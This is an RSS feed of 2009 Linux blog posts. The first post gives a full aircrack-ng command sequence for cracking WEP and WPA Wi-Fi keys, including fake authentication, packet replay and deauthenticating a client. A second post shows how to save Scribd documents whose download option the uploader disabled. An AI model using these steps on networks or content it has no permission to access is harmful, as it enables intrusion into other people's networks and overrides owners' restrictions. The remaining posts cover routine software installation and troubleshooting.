<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>HydTech &#187; jaunty</title>
	<atom:link href="http://hydtechblog.com/tag/jaunty/feed/" rel="self" type="application/rss+xml" />
	<link>http://hydtechblog.com</link>
	<description>anotha hyd anotha day</description>
	<lastBuildDate>Sun, 24 Jul 2011 22:38:31 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Cracking WEP &amp; WPA with IBM Lenovo X60 &#8211; Basics</title>
		<link>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/</link>
		<comments>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 05:43:21 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[lenovo]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wireless]]></category>
		<category><![CDATA[wpa]]></category>
		<category><![CDATA[x60]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=460</guid>
		<description><![CDATA[At first injection with the Intel pro wireless cards was impossible. Then came the ipwraw driver. Now, we no longer need the ipwraw as the iwl3945 card supports injection. Most linux distros now ship with this driver. Follow these steps for a succesful WEP crack in Ubuntu: download necessary files sudo apt-get install aircrack-ng place [...]]]></description>
			<content:encoded><![CDATA[<p>At first injection with the Intel pro wireless cards was impossible.  Then came the ipwraw driver.  Now, we no longer need the ipwraw as the iwl3945 card supports injection<a href="http://hydtechblog.com">.</a>  Most linux distros now ship with this driver.</p>
<p>Follow these steps for a succesful WEP crack in Ubuntu:</p>
<p>download necessary files<br />
sudo apt-get install aircrack-ng</p>
<p>place card in monitor mode<br />
sudo airmon-ng start wlan0</p>
<p>test injection<br />
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80  mon0<br />
(0% means injection not working)</p>
<p>capture data and write to file called output<br />
 sudo airodump-ng -c 9 &#8211;bssid 00:14:6C:7E:40:80 -w output mon0</p>
<p>fake authentication<br />
 sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0</p>
<p>replay mode<br />
 sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0</p>
<p>run aircrack<br />
sudo  aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap</p>
<p>For WPA cracking follow this:</p>
<p>monitor mode<br />
sudo airmon-ng start wlan0</p>
<p>collect handshake<br />
sudo  airodump-ng -c 9 &#8211;bssid 00:14:6C:7E:40:80 -w psk mon0</p>
<p>deauth connected client<br />
sudo  aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0</p>
<p>cracking<br />
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap</p>
<p>These are just refreshers. For more help check www.aircrack-ng.org</p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=460&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>How To save documents from Scribd when disabled by user with Ubuntu Intrepid or Jaunty</title>
		<link>http://hydtechblog.com/2009/03/17/scribd/</link>
		<comments>http://hydtechblog.com/2009/03/17/scribd/#comments</comments>
		<pubDate>Tue, 17 Mar 2009 06:59:13 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[fedora]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[cups-pdf]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[karmic]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[pdf printer]]></category>
		<category><![CDATA[scribd]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=278</guid>
		<description><![CDATA[Some users disable the option to download a document from scribd but the option to print is still available. We can use this to our advantage and save the document by printing the file to PDF. In Ubuntu, we need to install cups-pdf to create a postscript printer. Check my previous post here for a [...]]]></description>
			<content:encoded><![CDATA[<p>Some users disable the option to download a document from scribd but the option to print is still available.  We can use this to our advantage and save the document by printing the file to PDF.</p>
<p><a href="http://hydtechblog.com/2009/03/17/how-to-print-to-pdf-in-ubuntu-intrepid-ibex-and-jaunty-jackalope/">In Ubuntu, we need to install cups-pdf to create a postscript printer.  Check my previous post here for a tutorial.</a></p>
<p>After installing the PDF printer, go to the document you want to save on scribd.  Select more -&gt; Print</p>
<p><img class="aligncenter size-full wp-image-279" title="scribd1" src="http://hydtech.files.wordpress.com/2009/03/scribd1.png" alt="scribd1" width="510" height="382" /></p>
<p>Select the PDF printer and hit print.  and wait&#8230;..<a href="http://hydtechblog.com">.</a>&#8230;&#8230;&#8230;. this can take upto 10-15 minutes depending on how big the file is.</p>
<p><img class="aligncenter size-full wp-image-280" title="scribd2" src="http://hydtech.files.wordpress.com/2009/03/scribd2.png" alt="scribd2" width="510" height="382" /></p>
<p>Check the print status.  6 minutes and still printing&#8230;&#8230;</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/scribd3.png" alt="scribd3" title="scribd3" width="510" height="382" class="aligncenter size-full wp-image-281" /></p>
<p>When done, the file will be saved in the PDF folder we created and will be called _stdin_.pdf</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/scribd4.png" alt="scribd4" title="scribd4" width="510" height="382" class="aligncenter size-full wp-image-282" /></p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=278&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/03/17/scribd/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Install/Update Opera 9.64 in Ubuntu Intrepid Ibex/Jaunty Jackalope</title>
		<link>http://hydtechblog.com/2009/03/08/installupdate-opera-964-in-ubuntu-intrepid-ibexjaunty-jackalope/</link>
		<comments>http://hydtechblog.com/2009/03/08/installupdate-opera-964-in-ubuntu-intrepid-ibexjaunty-jackalope/#comments</comments>
		<pubDate>Sun, 08 Mar 2009 19:36:25 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[browser]]></category>
		<category><![CDATA[intrepid]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[karmic]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[opera]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=261</guid>
		<description><![CDATA[In this tutorial I will show you how to install or update to Opera 9.64 in Ubuntu. This guide is for a beginner to the operating system and will work for any version of Ubuntu, including other Debian based linux distributions. If you are upgrading, first check for an update under help in the browser [...]]]></description>
			<content:encoded><![CDATA[<p>In this tutorial I will show you how to install or update to Opera 9.64 in Ubuntu.  This guide is for a beginner to the operating system and will work for any version of Ubuntu, including other Debian based linux distributions.</p>
<p>If you are upgrading, first check for an update under help in the browser or you can directly go to the website and download the latest version.</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/operaup1.png" alt="opera update" title="opera update" width="510" height="382" class="aligncenter size-full wp-image-262" /></p>
<p>save the file to the desktop and close the browser.<br />
<img src="http://hydtech.files.wordpress.com/2009/03/operaup2.png" alt="opera update " title="opera update " width="510" height="382" class="aligncenter size-full wp-image-263" /></p>
<p>double click the .deb file and click install package even if you are upgrading.<br />
<img src="http://hydtech.files.wordpress.com/2009/03/operaup3.png" alt="opera update" title="opera update" width="510" height="382" class="aligncenter size-full wp-image-264" /></p>
<p>close the installation process and restart your browser<br />
<img src="http://hydtech.files.wordpress.com/2009/03/operaup4.png" alt="opera update" title="opera update" width="510" height="382" class="aligncenter size-full wp-image-265" /></p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=261&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/03/08/installupdate-opera-964-in-ubuntu-intrepid-ibexjaunty-jackalope/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Gnome Display Manager problems (error setting mtrr) in Ubuntu Intrepid 8.10</title>
		<link>http://hydtechblog.com/2009/02/26/gnome-display-manager-problems-error-setting-mtrr-in-ubuntu-intrepid-810/</link>
		<comments>http://hydtechblog.com/2009/02/26/gnome-display-manager-problems-error-setting-mtrr-in-ubuntu-intrepid-810/#comments</comments>
		<pubDate>Thu, 26 Feb 2009 21:53:02 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[display]]></category>
		<category><![CDATA[gdm]]></category>
		<category><![CDATA[gnome]]></category>
		<category><![CDATA[intrepid]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[mtrr]]></category>
		<category><![CDATA[proc]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[xorg]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=241</guid>
		<description><![CDATA[Last night I spent a lot of time trying to get my Gnome Display manager to work in Ubuntu Intrepid 8.10. Alot of people are having a hard time with the display after upgrading from Hardy 8.04 to Intrepid 8.10. Every time I try to shutdown the system, I get an error about &#8220;error setting [...]]]></description>
			<content:encoded><![CDATA[<p>Last night I spent a lot of time trying to get my Gnome Display manager to work in Ubuntu Intrepid 8.10.  Alot of people are having a hard time with the display after upgrading from Hardy 8.04 to Intrepid 8.10.<br />
Every time I try to shutdown the system<a href="http://hydtechblog.com">,</a> I get an error about &#8220;error setting MTRR&#8221;.  These are the steps I took to fix the issue.</p>
<p>*IMPORTANT*- before doing any troubleshooting with X, I recommend backing up the xorg configuration file.<br />
<code>sudo cp /etc/X11/xorg.conf /home/user/Desktop/xorg.conf.old</code></p>
<p>I tried clearing out the /proc/mtrr and rewriting it by using the following commands:</p>
<p><code>echo "disable=0" &gt;| /proc/mtrr<br />
echo "disable=1" &gt;| /proc/mtrr<br />
echo "disable=0" &gt;| /proc/mtrr</code></p>
<p>and inserting</p>
<p><code>echo "base=0x00000000 size= type=write-back" &gt;| /proc/mtrr</code></p>
<p><a href="http://ubuntuforums.org/archive/index.php/t-115104.html">check here for more help</a>.</p>
<p>Still no luck.</p>
<p>Tired and frustrated, I decided to reinstall</p>
<p><code>sudo apt-get install --reinstall gdm, nautlius, ubuntu-desktop, x-gnome-session, xserver-xorg</code></p>
<p>I finally did:<br />
<code>sudo update-alternatives --configure x-session-manager</code><br />
<a href="http://hydtechblog.com/2009/02/15/set-default-applications-in-ubuntu/" class="broken_link">More on update-alternatives here</a>.</p>
<p>Searching on the web, I found this on bugs.launchpad.net</p>
<blockquote><p>I had this problem exactly as described in the original report, after an upgrade from 8.04 to 8.10.</p>
<p>I eventually tracked it down to a dangling link from /etc/alternatives/x-session-manager. It was pointing to a nonexistent KDE4 startkde script, which presumably used to exist in 8.04. I had never actually used KDE4 seriously, but I must have installed it at some point in the old system and run it before reverting to gnome. I guess that means the old KDE4 start script was equally capable of restoring a gnome session, or something.</p>
<p>Anyway, &#8220;sudo update-alternatives &#8211;auto x-session-manager&#8221; seems to fix it.</p>
<p>(The workaround described in an earlier comment, of explicitly running the GNOME session type, also worked. But I wanted to find a fix that would work for the X client script option as well, because I was also trying to investigate the session script to work out why my session was not being restored properly. Unfortunately, then I ran into bug 249373, &#8220;gnome session does not restore the previous session&#8221; &#8212; which answers that one. I would never have upgraded to 8.10 if I had known about that absolutely amazing regression. But that&#8217;s another matter.)</p>
<p>Chris</p></blockquote>
<p>After all that, I replaced my backup xorg.conf file<br />
<code>sudo cp /home/user/Desktop/xorg.conf.old /etc/X11/xorg.conf</code></p>
<p>Restarted the system, and now its working fine!</p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=241&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/02/26/gnome-display-manager-problems-error-setting-mtrr-in-ubuntu-intrepid-810/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to fresh install OpenOffice 3.0.1 on Ubuntu 8.10 Intrepid, 9.04 Jaunty, Fedora 10 and openSuse 11</title>
		<link>http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/</link>
		<comments>http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/#comments</comments>
		<pubDate>Tue, 24 Feb 2009 01:51:44 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[fedora]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[intrepid]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[openoffice]]></category>
		<category><![CDATA[openoffice 3.0.1 ubuntu intrepid ibex fresh clean install]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=226</guid>
		<description><![CDATA[Instructions for Ubuntu: Yesterday I noticed that the menu on my OpenOffice had some weird characters. I finally figured out that some of the system fonts in Ubuntu are not compatible with OO. I managed to change the fonts back by going to System -&#62; Preferences -&#62; Appearance -&#62; Fonts. But it was too late. [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Instructions for Ubuntu:</strong></p>
<p>Yesterday I noticed that the menu on my OpenOffice had some weird characters.  I finally figured out that some of the system fonts in Ubuntu are not compatible with OO.  I managed to change the fonts back by going to System -&gt; Preferences -&gt; Appearance -&gt; Fonts.  But it was too late.  During the process I upgraded, uninstalled the whole program and reinstalled it back again<a href="http://hydtechblog.com">.</a> For this process, I used synaptic package manager to find everything that said openoffice and marked it for complete removal.</p>
<p><img class="aligncenter size-full wp-image-228" title="remove OpenOffice" src="http://hydtech.files.wordpress.com/2009/02/oo_removal.png" alt="remove OpenOffice" width="510" height="382" /></p>
<p>I could have also opened up terminal and typed:<br />
<code>sudo apt-get remove openoffice*.*</code></p>
<p>Then, I went to openoffice.org and downloaded the .deb file for 3.0.1 (OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz) and extracted it to the desktop. Then I typed:<br />
<code>sudo dpkg -i ~/Desktop/OOO300_m15_native_packed-1_en-US.9379/DEBS/*.deb</code><br />
<img class="aligncenter size-full wp-image-230" title="install_office" src="http://hydtech.files.wordpress.com/2009/02/install_office.png" alt="install_office" width="510" height="382" /></p>
<p>dpkg is a tool to install, build, remove and manage Debian GNU/Linux packages<a href="http://www.hydtechblog.com">.</a> The -i option is used to install a file or in this case, several files.  We selected *.deb which means select all the files with a .deb extension and install them.  We could have alternatively double clicked each .deb package and installed it separately, but the command line is a much more powerful option.</p>
<p>Next, to install the last package stored in a different folder, I typed:<br />
<code>sudo dpkg -i ~/Desktop/OOO300_m15_native_packed-1_en-US.9379/DEBS/desktop-integration/openoffice.org3.0-debian-menus_3.0-9376_all.deb</code><br />
<img class="aligncenter size-full wp-image-231" title="install_office2" src="http://hydtech.files.wordpress.com/2009/02/install_office2.png" alt="install_office2" width="510" height="382" /></p>
<p>I believe I could have used the &#8211;recursive or -R option and specified the directory, which would have installed all the packages in the folder including all the sub-folders.</p>
<p>That&#8217;s all it took.</p>
<p><strong>Instructions for Fedora and openSuse: </strong></p>
<p>Goto openoffice.org and Download the rpm in tar.gz format onto the Desktop</p>
<p>open up terminal, become root and untar the file:<br />
<code>su<br />
(enter password)<br />
tar -xvf /home/black/Desktop/OOo_3.0.1_LinuxIntel_install_wJRE_en-US.tar.gz</code><br />
<img class="aligncenter size-full wp-image-317" title="oo1" src="http://hydtech.files.wordpress.com/2009/02/oo1.png" alt="oo1" width="510" height="382" /><br />
cd into the directory:<br />
<code>cd OOO300_m15_native_packed-1_en-US.9379/</code><br />
<img class="aligncenter size-full wp-image-318" title="oo2" src="http://hydtech.files.wordpress.com/2009/02/oo2.png" alt="oo2" width="510" height="382" /><br />
setup:<br />
<code>./setup</code><br />
<img class="aligncenter size-full wp-image-319" title="oo3" src="http://hydtech.files.wordpress.com/2009/02/oo3.png" alt="oo3" width="510" height="382" /><br />
follow install directions:<br />
<img class="aligncenter size-full wp-image-320" title="oo4" src="http://hydtech.files.wordpress.com/2009/02/oo4.png" alt="oo4" width="510" height="382" /></p>
<p><img class="aligncenter size-full wp-image-321" title="oo5" src="http://hydtech.files.wordpress.com/2009/02/oo5.png" alt="oo5" width="510" height="382" /></p>
<p>[digg=http://digg.com/linux_unix/Tutorial_How_to_Install_OpenOffice_on_Ubuntu_Fedora_openSuse]</p>
<p>Yatta !</p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=226&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

